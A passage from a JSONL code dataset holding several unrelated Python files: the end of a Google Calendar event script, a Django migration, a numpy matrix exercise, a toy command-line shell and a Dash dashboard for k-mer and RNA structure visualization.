zone is static just because not really necessary \n event = {\n 'summary': summary_in,\n 'location': loc_in,\n 'description': desc_in,\n 'start': {\n 'dateTime': dto_start.isoformat(\"T\"),\n 'timeZone': 'US/Eastern',\n },\n 'end': {\n 'dateTime': dto_end.isoformat(\"T\"),\n 'timeZone': 'US/Eastern',\n },\n # 'recurrence': [\n # 'RRULE:FREQ=DAILY;COUNT=2'\n # ],\n 'attendees': list_of_attendees,\n 'reminders': {\n 'useDefault': False,\n 'overrides': [\n {'method': 'email', 'minutes': 24 * 60},\n {'method': 'popup', 'minutes': 10},\n ],\n },\n }\n \n #Uses the service to insert the event\n event = service.events().insert(calendarId='primary', body=event, sendUpdates='all').execute()\n #could possibly make a popup with the HTML link as output\n print ('Event created: %s' % (event.get('htmlLink')))\n\nif __name__ == '__main__':\n main()\n","sub_path":"old (ignore)/runner - Copy.py","file_name":"runner - Copy.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"70711472","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_post_public'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('category', models.CharField(max_length=255, verbose_name='Категория')),\n ],\n ),\n migrations.AlterField(\n model_name='post',\n name='author',\n field=models.CharField(max_length=255, default='admin', verbose_name='Автор'),\n ),\n migrations.AlterField(\n model_name='post',\n name='category',\n field=models.CharField(max_length=255, verbose_name='Категория'),\n ),\n migrations.AlterField(\n model_name='post',\n name='content',\n field=models.TextField(max_length=10000, verbose_name='Текст'),\n ),\n migrations.AlterField(\n model_name='post',\n name='title',\n field=models.CharField(max_length=255, verbose_name='Название'),\n ),\n ]\n","sub_path":"blog/migrations/0003_auto_20151105_0036.py","file_name":"0003_auto_20151105_0036.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"445881177","text":"#имя файла: Task 12.py\r\n#номер версии: 1.0\r\n#автор и его учебная группа: Александровский А.П., ЭУ-142\r\n#дата создания: 22.05.2019\r\n#связанные файлы: пакет numpy\r\n#версия Python: 3.6\r\n#ОПИСАНИЕ: Создать прямоугольную матрицу A, имеющую N строк и M столбцов со\r\n #случайными элементами. Разделить элементы каждой строки на элемент\r\n #этой строки с наибольшим значением.\r\n\r\n\r\n\r\n\r\n# Подключение библиотеки Numpy и Random\r\nimport numpy as np\r\nimport random\r\n\r\n# Число строк и столбцов\r\nN = random.randint(2, 10)\r\nM = random.randint(1, 10)\r\n\r\n# Так как матрица должна быть прямоугольной, то N не может быть равно M\r\nwhile N == M:\r\n N = random.randint(1, 10)\r\n M = random.randint(1, 10)\r\n\r\n# Создание матрицы\r\nA = np.random.randint(0, 10, (N, M)).astype(np.float64)\r\nprint(str(A) + \"\\n\")\r\n\r\n# Нахождение наибольшее значение для каждой строки матрицы\r\nMax = A.max(axis=1)\r\nMax = np.array(Max)[: , np.newaxis]\r\n\r\n# Деление элеменотов\r\nA = A / Max\r\nprint(\"\\nНовая матрица: \\n\" + str(A))","sub_path":"2 Часть курсовой работы/Task 12.py","file_name":"Task 12.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399299300","text":"import os\nimport sys\nimport numpy\nimport shutil\nfrom task9 import *\nfrom pathlib import Path\n\ndef main(args):\n cwd = Directory(os.getcwd())\n while True:\n cmdtokens = input('{path}$ '.format(path=cwd.path)).split()\n if not cmdtokens:\n continue\n cmd = cmdtokens[0]\n cmdargs = cmdtokens[1:]\n if cmd == 'ls':\n print()\n path = cwd.path if not cmdargs else cmdargs[0]\n directory = cwd.getsubdirectory(path)\n for item in directory.items():\n if item.isfile():\n print('{name}\\tFILE\\t{size}'.format(\n name=item.getname(), size=len(item)))\n else:\n print('{name}\\tDIR'.format(name=item.getname()))\n print()\n elif cmd == 'cd':\n new_path = ''.join(cmdargs)\n if os.path.isdir(new_path):\n path = new_path\n if '..' in new_path :\n for count in range(new_path.count('..')):\n cwd = Directory(os.path.split(cwd.get_path_name())[0])\n os.chdir(cwd.get_path_name())\n else:\n cwd = Directory(os.path.join(cwd.get_path_name(), path))\n os.chdir(cwd.get_path_name())\n elif not cmdargs or cmdargs == ['~/']:\n path = str(Path.home())\n cwd = Directory(path)\n os.chdir(cwd.get_path_name())\n else:\n print('Error! There is no such directory!')\n elif cmd == 'cat':\n new_path = ''.join(cmdargs)\n if os.path.isfile(new_path):\n with open(new_path, 'r') as file:\n for line in file:\n print(line.rstrip())\n elif cmd == 'head':\n number_of_rows = 10\n new_path = ''.join(cmdargs)\n if os.path.isfile(new_path):\n with open(new_path, 'r') as file:\n while number_of_rows != 0:\n print(file.readline().rstrip())\n number_of_rows -= 1\n elif cmd == 'tail':\n number_of_rows = 10\n new_path = ''.join(cmdargs)\n if os.path.isfile(new_path):\n with open(new_path, 'r') as file:\n my_lines = file.readlines()\n for line in my_lines[-number_of_rows:]:\n print(line.rstrip())\n elif cmd == 'pwd':\n print(os.getcwd())\n elif cmd == 'touch':\n new_path = ''.join(cmdargs)\n File(new_path).create() \n elif cmd == 'find':\n find_file = ''.join(cmdargs)\n all_paths = list(map(lambda x: x.get_path_name(), Directory(os.getcwd()).filesrecursive()))\n for path in all_paths:\n if find_file in os.path.split(path)[1]:\n print(path)\n elif cmd == 'clear':\n print('\\n' * 150)\n elif cmd == 'mv':\n old_name = cmdargs[0]\n new_name = cmdargs[1]\n if os.path.exists(old_name) and os.path.exists(os.path.join(os.getcwd(), new_name)) == False:\n os.rename(old_name, new_name)\n elif os.path.isfile(old_name) and os.path.isdir(new_name):\n shutil.move(old_name, new_name)\n else:\n print(\"Error: wrong input\")\n elif cmd == 'cp':\n old_name = cmdargs[0]\n new_name = cmdargs[1]\n if os.path.isfile(old_name) and os.path.isdir(new_name):\n shutil.copy(old_name, new_name)\n else:\n print(\"Error: wrong input\")\n elif cmd == 'rm':\n item = ''.join(cmdargs)\n if FSItem(item).isfile():\n os.remove(item)\n elif FSItem(item).isdirectory():\n shutil.rmtree(item)\n elif cmd == 'exit':\n print(\"Bye bye!\")\n break\n","sub_path":"first_session/taskA.py","file_name":"taskA.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265789065","text":"import dash\nimport dash_core_components as dcc\nimport dash_table\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport os\nfrom dash.exceptions import PreventUpdate\nimport dash_bio as dashbio\n\nfrom src.processing import Processing\nfrom src.dashView import initializeData\n\n# files, which are processed\n# read-only\nfile_list = None\nstruct_data = None\n\n\n# starts dash\n# file_list: input data\n# sec_struct_data: input structural data\n# port: port\ndef startDash(files, port, sec_struct_data):\n global file_list\n global struct_data\n file_list = files\n struct_data = sec_struct_data\n app.run_server(debug=False, host='0.0.0.0', port=port)\n\n\n# calculates slider ranges\n# peak-boolean sets first value to 'none' (for peak-slider)\ndef markSliderRange(min_val, max_val, peak):\n mark = {}\n if peak:\n min_val += 1\n mark[0] = 'none'\n for i in range(min_val, max_val + 1):\n mark[i] = str(i)\n return mark\n\n\n# range() function for floats\n# start: start-value which is head of list\n# step: steps between two values\n# run: number of loop runs\ndef float_range(start, step, run):\n for_list = [start]\n for i in range(1, run):\n next_step = start + step * i\n for_list.append(next_step)\n return for_list\n\n\n# checks if custom normalization rates sum up to one\n# parameters (e.g. ee,ss,etc. ..): rate for 2-mer\ndef check_sum(ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs):\n custom_rates = [ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs]\n k_mer_sum = round(sum(custom_rates), 1)\n check_passed = bool(k_mer_sum == 1)\n\n return check_passed\n\n\n# ------------------------------------------- Dash-Layout --------------------------------------------------------------\n\napp = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\n\napp.title = \"k-Mer Dash\"\n\napp.layout = dbc.Container([\n # ------------------------------------------ Store -----------------------------------------------------------------\n dbc.Spinner(children=[dcc.Store(id='memory', storage_type='memory')],\n color=\"primary\", fullscreen=True),\n\n # -------------------------------------------------------------------------------------------------------------------\n dbc.Card([\n dbc.Row([\n dbc.Col(\n dbc.CardBody([\n html.H3(\"Menu\"),\n html.Br(),\n # ------------------------------------- Select File1 And File 2 ------------------------------------\n html.H6(\"Selected files:\", id=\"sel_files_header\"),\n dbc.Select(\n id=\"file1\",\n options=[],\n value=\"0\"),\n dbc.Select(\n id=\"file2\",\n options=[],\n value=\"1\"),\n dbc.Tooltip(\n \"Files containing DNA nucleotide-sequences used for k-mer visualization\",\n target=\"sel_files_header\"\n ),\n html.Br(),\n html.Br(),\n # ------------------------------------- Select Structure Files -------------------------------------\n html.H6(\"Selected structure files:\", id=\"struc_files_header\"),\n dbc.Select(\n id=\"file3\",\n options=[{\"label\": \"-\", \"value\": \"0\"}],\n value=\"0\"),\n dbc.Select(\n id=\"file4\",\n options=[{\"label\": \"-\", \"value\": \"0\"}],\n value=\"1\"),\n dbc.Tooltip(\n \"Files containing element-strings used for RNA structure heatmaps(s)\",\n target=\"struc_files_header\"\n ),\n html.Br(),\n html.Br(),\n # ------------------------------------------- K ----------------------------------------------------\n html.H6(\"K-mer length:\", id=\"k_header\"),\n dcc.Slider(\n id='k',\n min=0,\n max=10,\n step=1,\n value=3,\n marks=markSliderRange(0, 10, False)\n ),\n dbc.Tooltip(\n \"Length of visualized substrings (k-mer)\",\n target=\"k_header\"\n ),\n html.Br(),\n # ----------------------------------------- Peak ---------------------------------------------------\n html.H6(\"Peak-position:\", id=\"peak_header\"),\n dcc.Slider(\n id='peak',\n min=1,\n max=10,\n step=1,\n value=0,\n marks=markSliderRange(0, 10, True)\n ),\n dbc.Tooltip(\n \"Highlighted position in sequence (e.g. assumed binding position \"\n \"of protein in given sequences)\",\n target=\"peak_header\"\n ),\n html.Br(),\n # ------------------------------------------ top ---------------------------------------------------\n html.H6(\"Top-values:\", id=\"top_header\"),\n dbc.Select(\n id='top',\n options=[\n {'label': '10', 'value': '0'},\n {'label': '20', 'value': '1'},\n {'label': '50', 'value': '2'},\n {'label': '100', 'value': '3'}\n ],\n value=\"0\"\n ),\n dbc.Tooltip(\n \"Number of highest k-mer occurrences\",\n target=\"top_header\"\n ),\n html.Br(),\n html.Br(),\n # -------------------------------- Highlighted Feature ---------------------------------------------\n html.H6(\"Highlighted feature:\", id=\"feature_header\"),\n dbc.Select(\n id=\"Feature\",\n options=[\n {\"label\": \"Frequency\", \"value\": \"1\"},\n {\"label\": \"T Occurrences\", \"value\": \"2\"},\n {\"label\": \"A Occurrences\", \"value\": \"3\"},\n {\"label\": \"C Occurrences\", \"value\": \"4\"},\n {\"label\": \"G Occurrences\", \"value\": \"5\"},\n ],\n value=\"1\"\n ),\n dbc.Tooltip(\n \"Highlighted/Colored property of PCAs\",\n target=\"feature_header\"\n ),\n html.Br(),\n html.Br(),\n # ------------------------------- Options structural data ------------------------------------------\n dbc.ButtonGroup(\n [dbc.Button(\"Extended options\", id=\"opt_btn_open\"),\n # dbc.Button(\"Export PDF\", id=\"ex_btn\",disabled=True)\n ],\n size=\"md\",\n className=\"mr-1\",\n ),\n dbc.Tooltip(\n \"Options for structural data visualization\",\n target=\"opt_btn_open\"\n ),\n dbc.Modal(\n [\n dbc.ModalHeader(\"Options for structural data visualization\"),\n dbc.ModalBody(children=[\n dcc.Checklist(\n id=\"sec_peak\",\n options=[{'label': 'show only peak positions', 'value': 'peaking'}],\n inputStyle={'margin-right': '3px'},\n ),\n dbc.Tooltip(\n \"Only show peak positions in RNA structure Heatmap(s)\",\n target=\"sec_peak\"\n ),\n html.Br(),\n html.Div(\"Normalization:\", id=\"norm_header\",\n style={'font-weight': 'bold', 'padding-bottom': '10px'}),\n html.Div(\"ERROR: sum of custom rates should be equal to 1\", id=\"error\",\n style={'font-weight': 'bold', 'color': 'red',\n 'padding-bottom': '10px'}, hidden=True),\n html.Div(\"ERROR: only numerical values between zero and one allowed\", id=\"error_type\",\n style={'font-weight': 'bold', 'color': 'red',\n 'padding-bottom': '10px'}, hidden=True),\n dcc.RadioItems(\n id=\"db\",\n options=[\n {'label': 'none', 'value': 'none'},\n {'label': 'use A.thaliana database', 'value': 'at_db'},\n {'label': 'use custom k-mer rates', 'value': 'custom_vals'}\n ],\n value='none',\n labelStyle={'display': 'block'},\n inputStyle={'margin-right': '3px'}\n ),\n dbc.Tooltip(\n \"Used data for normalization of structural data\",\n target=\"norm_header\"\n ),\n html.Div(id=\"norm_input\", children=[\n html.Table(children=[\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"EE\"),\n dbc.Input(id=\"EE\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0)], ),\n html.Td(children=[\n html.Div(\"ES\"),\n dbc.Input(id=\"ES\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0)], ),\n html.Td(children=[\n html.Div(\"SS\"),\n dbc.Input(id=\"SS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0)], )\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"SI\"),\n dbc.Input(id=\"SI\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"IS\"),\n dbc.Input(id=\"IS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"II\"),\n dbc.Input(id=\"II\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], )\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"SH\"),\n dbc.Input(id=\"SH\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"HS\"),\n dbc.Input(id=\"HS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"HH\"),\n dbc.Input(id=\"HH\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], )\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"SM\"),\n dbc.Input(id=\"SM\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"MS\"),\n dbc.Input(id=\"MS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"SE\"),\n dbc.Input(id=\"SE\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"BB\"),\n dbc.Input(id=\"BB\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"BS\"),\n dbc.Input(id=\"BS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"SB\"),\n dbc.Input(id=\"SB\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"MM\"),\n dbc.Input(id=\"MM\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[]),\n html.Td(children=[\n html.Br(),\n dbc.Button(\"Reset\", id=\"opt_btn_reset\",\n style={'margin': 'auto'})]),\n dbc.Tooltip(\n \"Reset table\",\n target=\"opt_btn_reset\"\n ),\n\n ])\n ], style={'width': '100%'}\n )\n ], style={'display': 'block'}, hidden=True),\n ]),\n dbc.ModalFooter(children=[\n dbc.ButtonGroup(\n [dbc.Button(\"Apply\", id=\"opt_btn_apply\"),\n dbc.Button(\"Close\", id=\"opt_btn_close\")],\n className=\"mr-1\",\n ),\n\n ]\n ),\n\n ],\n id=\"ex_options\",\n backdrop='static',\n centered=True\n ),\n\n ], style={\n 'height': '100vh',\n 'left': '0px',\n 'background': 'lightgrey'}),\n width=2,\n style={\"padding-right\": '0px',\n \"padding-left\": '0px',\n 'margin-right': '0px'}),\n\n # --------------------------------------- ScatterPlot ------------------------------------------------------\n dbc.Col([\n dbc.Card([\n dbc.Spinner(children=[\n dcc.Tabs(value=\"s-tab\", children=[\n dcc.Tab(label=\"Scatterplot\", value='s-tab', id=\"s-tab1\", children=[\n dcc.Graph(figure={}, id=\"scatter\", style={'height': '40vh'})\n ]),\n # -------------------------------------- FornaContainer ------------------------------------\n dcc.Tab(value='r-tab', id=\"s-tab2\", children=[\n dbc.Card(\n dashbio.FornaContainer(\n id='forna', height='300', width='400', colorScheme='custom'\n ),\n className=\"w-100 p-3\",\n ),\n ]),\n dcc.Tab(value='r-tab2', id=\"s-tab3\", children=[\n dbc.Card(\n dashbio.FornaContainer(\n id='forna2', height='300', width='400', colorScheme='custom'\n ),\n className=\"w-100 p-3\",\n ),\n ])\n ]),\n dbc.Tooltip(\n \"Scatterplot of k-mer occurences from selected files containing \"\n \"nucleotide sequences\",\n target=\"s-tab1\"\n ),\n dbc.Tooltip(\n \"Visualization of arbitrary RNA structure, highlighting k-mer occurrences of \"\n \"element strings from first selected structural data file\",\n target=\"s-tab2\"\n ),\n dbc.Tooltip(\n \"Visualization of arbitrary RNA structure, highlighting k-mer occurrences of \"\n \"element strings from second selected structural data file\",\n target=\"s-tab3\"\n ),\n ],\n color=\"primary\", spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n\n ], style={\n 'background': '#f2f2f2', 'height': '50vh'}, outline=True),\n\n # -------------------------------------------- TopK ----------------------------------------------------\n dbc.Spinner(children=[dbc.Card(id=\"topK\", children=[], style={\n 'background': '#f2f2f2', 'height': '49vh', 'overflow-y': 'scroll'}, outline=True)],\n color=\"primary\", spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n ],\n width=5,\n style={\"padding-right\": '5px',\n \"padding-left\": '10px'}),\n\n # ------------------------------------------------- PCAs ---------------------------------------------------\n dbc.Col(\n [dbc.Card([\n dbc.Spinner(children=[\n dcc.Tabs(id='tabs-example', value='Tab1', children=[\n dcc.Tab(label=\"\", value='Tab1', id=\"Tab1\", children=[\n dcc.Graph(figure={}, id=\"PCA1\",\n style={'height': '42vh'}\n )\n ]),\n dcc.Tab(label=\"\", value='Tab2', id=\"Tab2\", children=[\n dcc.Graph(figure={}, id=\"PCA2\",\n style={'height': '42vh'}\n )\n ]),\n ],\n ),\n dbc.Tooltip(\n \"Principal component analysis (PCA) of first selected file containing nucleotide sequences\",\n target=\"Tab1\"\n ),\n dbc.Tooltip(\n \"Principal component analysis (PCA) of \"\n \"second selected file containing nucleotide sequences\",\n target=\"Tab2\"\n ),\n ], color=\"primary\",\n spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n\n ], style={\n 'background': '#f2f2f2', 'height': '50vh'}, outline=True),\n\n # ------------------------------------------- MSA --------------------------------------------------\n dbc.Spinner(children=[dbc.Card(id=\"msa\", children=[], style={\n 'background': '#f2f2f2', 'height': '49vh', 'overflow-y': 'scroll'}, outline=True)],\n color=\"primary\", spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n ],\n width=5,\n style={\"padding-right\": '0px',\n \"padding-left\": '0px'}\n )\n\n ], style={'padding-top': '0px', 'padding-bottom': '0px', 'margin-top': '0px', 'margin-bottom': '0px',\n 'margin-left': '0px', 'padding-left': '0px'},\n className=\"mw-100 mh-100\"\n ),\n\n ],\n className=\"mw-100 mh-100\"),\n], className=\"mw-100 mh-100\", style={'left': '0px', 'margin-left': '0px', 'padding': '0px'})\n\n\n# ------------------------------------ Store Callback ------------------------------------------------------------------\n\n@app.callback(\n [dash.dependencies.Output('memory', 'data')],\n [dash.dependencies.Input('file1', 'value'),\n dash.dependencies.Input('file2', 'value'),\n dash.dependencies.Input('file3', 'value'),\n dash.dependencies.Input('file4', 'value'),\n dash.dependencies.Input('k', 'value'),\n dash.dependencies.Input('peak', 'value'),\n dash.dependencies.Input('top', 'value'),\n dash.dependencies.Input('Feature', 'value'),\n dash.dependencies.Input('opt_btn_apply', 'n_clicks'),\n dash.dependencies.State('sec_peak', 'value'),\n dash.dependencies.State('EE', 'value'),\n dash.dependencies.State('SS', 'value'),\n dash.dependencies.State('II', 'value'),\n dash.dependencies.State('MM', 'value'),\n dash.dependencies.State('BB', 'value'),\n dash.dependencies.State('SI', 'value'),\n dash.dependencies.State('IS', 'value'),\n dash.dependencies.State('SM', 'value'),\n dash.dependencies.State('MS', 'value'),\n dash.dependencies.State('ES', 'value'),\n dash.dependencies.State('SE', 'value'),\n dash.dependencies.State('HH', 'value'),\n dash.dependencies.State('HS', 'value'),\n dash.dependencies.State('SH', 'value'),\n dash.dependencies.State('SB', 'value'),\n dash.dependencies.State('BS', 'value'),\n dash.dependencies.State('db', 'value'),\n dash.dependencies.State('memory', 'data')]\n)\n# calculates new data for tables/diagrams\n# k: k-mer length\n# peak: peak: peak-position, where sequences should be aligned\n# top: number of best values\n# pca_feature: number of T or k-mer-Frequency for PCAs\n# apply_options_btn: n_clicks of apply-button within modal\n# sec_peak: peak status (-1: no data, 0: False, 1: True) for structural data\n# parameters (e.g. ee,ss,etc. ...): custom rates of 2-mer\n# norm_option: normalization option (none, for A.thaliana, custom)\n# data: storage to share data between callbacks\ndef updateData(f1, f2, f3, f4, k, peak, top, pca_feature, apply_options_btn, sec_peak,\n ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs, norm_option, data):\n normalization_vector = None\n\n selected_struc = None\n\n normalization_status = -1\n\n no_peak = 0\n\n no_sec_peak_false = 0\n\n no_sec_peak_true = 1\n\n ctx = dash.callback_context\n element_id = ctx.triggered[0]['prop_id'].split('.')[0]\n\n # if custom rates given, check input\n if element_id == \"opt_btn_apply\" and norm_option == 'custom_vals':\n normalization_status = 1\n custom_rates = [ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs]\n # if input contains non-digits, prevent update\n labels = [\"EE\", \"SS\", \"II\", \"MM\", \"BB\", \"SI\", \"IS\", \"SM\", \"MS\", \"ES\", \"SE\", \"HH\", \"HS\", \"SH\", \"SB\", \"BS\"]\n if None in custom_rates:\n return dash.no_update\n check_sum_passed = check_sum(ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs)\n # if sum of custom rates is one, do normalization\n if check_sum_passed:\n normalization_vector = dict(zip(labels, custom_rates))\n # otherwise prevent update\n else:\n return dash.no_update\n elif element_id == \"opt_btn_apply\" and norm_option == 'at_db':\n normalization_status = 0\n elif not element_id == \"opt_btn_apply\" and data is not None:\n sec_peak = data['last_sec_peak']\n normalization_status = data['last_norm_stat']\n\n # translate dropdown value into real value\n top_opt_val = {'0': 10, '1': 20, '2': 50, '3': 100}\n\n top = top_opt_val[top]\n\n if peak == no_peak:\n peak = None\n\n if sec_peak == ['peaking']:\n no_sec_peak = no_sec_peak_false # =False\n else:\n no_sec_peak = no_sec_peak_true # =True\n\n # initialize (structural) data for calculations\n if data is None:\n selected = [file_list[0], file_list[1]]\n\n if struct_data is not None:\n if len(struct_data) > 1:\n selected_struc = [struct_data[0], struct_data[1]]\n else:\n selected_struc = [struct_data[0]]\n else:\n selected = [file_list[int(f1)], file_list[int(f2)]]\n if struct_data is not None:\n if len(struct_data) > 1:\n selected_struc = [struct_data[int(f3)], struct_data[int(f4)]]\n else:\n selected_struc = [struct_data[int(f3)]]\n\n new_process = initializeData.initData(file_list, selected, k, peak, top, pca_feature, selected_struc, no_sec_peak)\n\n # calculate top-table\n top_k = Processing.getTopKmer(new_process).copy()\n kmer = top_k.index\n top_k[\"K-Mer\"] = kmer\n top_k[\"\"] = [\"\" for i in range(0, len(top_k))]\n top_k = top_k[[\"\", \"K-Mer\", \"Frequency\", \"File\"]]\n top_k = top_k.sort_values(by=\"Frequency\", ascending=False)\n top_k_table = [\n dash_table.DataTable(columns=[{\"name\": i, \"id\": i} for i in top_k.columns], data=top_k.to_dict('records'),\n style_table={'overflow-x': 'hidden'},\n style_cell={'textAlign': 'center'},\n export_format=\"csv\",\n sort_action='native')]\n\n # calculate MSA\n\n algn1, algn2, f1_name, f2_name = initializeData.getAlignmentData(new_process)\n\n # if columns differ in their length, need to do some adaptions\n if (len(algn1) > 1 and len(algn2) > 1) or (len(algn1) <= 1 and len(algn2) <= 1):\n if len(algn1) <= 1 and len(algn2) <= 1:\n algn1_df = pd.DataFrame(columns=[f1_name], data=['No data to align'])\n algn2_df = pd.DataFrame(columns=[f2_name], data=['No data to align'])\n else:\n algn1_df = pd.DataFrame(columns=[f1_name], data=algn1)\n algn2_df = pd.DataFrame(columns=[f2_name], data=algn2)\n\n algn1_df = pd.concat([algn1_df, algn2_df], ignore_index=False, axis=1)\n msas = [\n dash_table.DataTable(columns=[{\"name\": i, \"id\": i} for i in algn1_df.columns],\n data=algn1_df.to_dict('records'),\n style_table={'overflow-x': 'hidden'},\n style_cell={'textAlign': 'center'},\n export_format=\"csv\")]\n\n else:\n if len(algn1) <= 1:\n algn1 = ['No data to align']\n\n algn1_df = pd.DataFrame(columns=[f1_name], data=algn1)\n algn2_df = pd.DataFrame(columns=[f2_name], data=algn2)\n algn1_df = pd.concat([algn1_df, algn2_df], ignore_index=False, axis=1)\n else:\n algn2 = ['No data to align']\n\n algn1_df = pd.DataFrame(columns=[f1_name], data=algn1)\n algn2_df = pd.DataFrame(columns=[f2_name], data=algn2)\n algn1_df = pd.concat([algn1_df, algn2_df], ignore_index=False, axis=1)\n\n msas = [dash_table.DataTable(columns=[{\"name\": i, \"id\": i} for i in algn1_df.columns],\n data=algn1_df.to_dict('records'),\n style_table={'overflow-x': 'hidden'},\n style_cell={'textAlign': 'center'},\n export_format=\"csv\")]\n\n # calculate scatterplot\n\n scatter = initializeData.getScatterPlot(new_process)\n\n # calculate PCAs\n\n pca_12, file1, file2 = initializeData.getPCA(new_process)\n pcas = [pca_12, file1, file2]\n\n seq_len = new_process.getSeqLen()\n\n # calculate RNA-Template(s), dotbracket-string(s), color-vector, color-scale\n # and color-domain(s) (highest value in color-vector)\n\n if struct_data is not None:\n\n structure_info = initializeData.getTemplateSecondaryStructure(new_process, normalization_vector,\n normalization_status, no_sec_peak)\n\n struct1, struct2, color1, color2, color_domain_max1, color_domain_max2, color_scale = structure_info\n\n if struct1 is not None and struct2 is not None:\n templates = [struct1[0], struct2[0]]\n dbs = [struct1[1], struct2[1]]\n elif struct1 is not None:\n templates = [struct1[0]]\n dbs = [struct1[1]]\n else:\n templates = []\n dbs = []\n else:\n templates = None\n dbs = None\n color1 = None\n color2 = None\n color_domain_max1 = None\n color_domain_max2 = None\n color_scale = None\n\n data = {'topK': top_k_table, 'msas': msas, 'scatter': scatter, 'pcas': pcas, 'seqLen': seq_len,\n 'templates': templates, 'dbs': dbs, 'colors': [color1, color2],\n 'color_max': [color_domain_max1, color_domain_max2], 'color_scale': color_scale,\n 'last_sec_peak': sec_peak, 'last_norm_stat': normalization_status}\n\n return [data]\n\n\n# --------------------------------------- File Dropdown Updater --------------------------------------------------------\n@app.callback([\n dash.dependencies.Output(\"file1\", \"options\"),\n dash.dependencies.Input(\"file2\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f2: second selected file\ndef updateFile1Dropdown(f2):\n return updateFileList(f2, False)\n\n\n@app.callback([\n dash.dependencies.Output(\"file2\", \"options\"),\n dash.dependencies.Input(\"file1\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f1: first selected file\ndef updateFile2Dropdown(f1):\n return updateFileList(f1, False)\n\n\n# disables already selected file in other dropdown\n# val: (structural) file\n# struct: bool (True= structural file is given)\ndef updateFileList(val, struct):\n if struct and struct_data is not None:\n files = struct_data\n elif struct and struct_data is None:\n return [{\"label\": \"-\", \"value\": \"0\"}]\n else:\n files = file_list\n\n option = [\n {'label': os.path.basename(files[i]), 'value': str(i)} if not (str(i) == val)\n else {'label': os.path.basename(files[i]), 'value': str(i), 'disabled': True}\n for i in range(0, len(files))]\n\n return [option]\n\n\n# --------------------------------------- Structure File Dropdown Updater ----------------------------------------------\n@app.callback([\n dash.dependencies.Output(\"file3\", \"options\"),\n dash.dependencies.Input(\"file4\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f4: second selected structural file\ndef updateFile4Dropdown(f4):\n return updateFileList(f4, True)\n\n\n@app.callback([\n dash.dependencies.Output(\"file4\", \"options\"),\n dash.dependencies.Input(\"file3\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f1: first selected structural file\ndef updateFile3Dropdown(f3):\n if struct_data is not None and len(struct_data) > 1:\n return updateFileList(f3, True)\n else:\n raise PreventUpdate\n\n\n# --------------------------------------- Slider Values Updater --------------------------------------------------------\n\n\n@app.callback(\n [\n dash.dependencies.Output(\"k\", \"min\"),\n dash.dependencies.Output(\"k\", \"max\"),\n dash.dependencies.Output(\"k\", \"marks\"),\n dash.dependencies.Output(\"peak\", \"min\"),\n dash.dependencies.Output(\"peak\", \"max\"),\n dash.dependencies.Output(\"peak\", \"marks\"),\n ],\n [\n dash.dependencies.Input('memory', 'modified_timestamp'),\n dash.dependencies.State('memory', 'data'),\n 